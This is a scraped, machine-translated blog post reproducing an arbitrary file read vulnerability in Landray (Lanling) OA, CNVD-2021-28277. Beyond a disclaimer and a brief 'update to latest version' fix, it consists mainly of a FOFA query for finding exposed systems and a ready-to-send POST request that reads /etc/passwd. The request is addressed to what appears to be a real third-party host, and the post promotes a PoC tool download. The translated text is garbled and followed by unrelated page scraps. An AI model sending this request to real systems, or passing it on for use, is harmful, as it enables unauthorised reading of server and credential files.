There is an arbitrary file reading vulnerability in Lanling OA

Enterprise 2023-08-26 00:27:43 views: null

Article directory

There is an arbitrary file reading vulnerability in Lanling OA

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Introduction to Lanling OA

WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account

Lanling oa office system is an oa office tool for instant office communication.

2. Vulnerability description

The full name of Lanling Software is Shenzhen Lanling Software Co., Ltd., which was established in Shenzhen Science and Technology Park in 2001. Landray is a well-known large-scale platform OA service provider in China and a leading provider of knowledge management solutions in China. It is a national high-tech enterprise specializing in organizational knowledge consulting, software research and development, implementation, and technical services. Recently, the Landray-OA system has been exploded Store arbitrary file read vulnerabilities and background rce

CVE number:
CNNVD number:
CNVD number: CNVD-2021-28277

3. Affect the version

4. fofa query statement

app="Landray-OA system"
There is an arbitrary file reading vulnerability in Lanling OA

5. Vulnerability recurrence

Vulnerability link: http://www.ynjd.cn:801/sys/ui/extend/varkind/custom.jsp
Vulnerability data package:

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}

There is an arbitrary file reading vulnerability in Lanling OA

6.POC&EXP

Follow the public account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 35 to get the download address of the POC tool:
There is an arbitrary file reading vulnerability in Lanling OA

7. Rectification opinions

It is recommended to use the system of Landray OA to update the system to the latest version, the appendix address: https://www.landray.com.cn/

8. Past review

Guess you like

Origin blog.csdn.net/nnn2188185/article/details/131237281
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com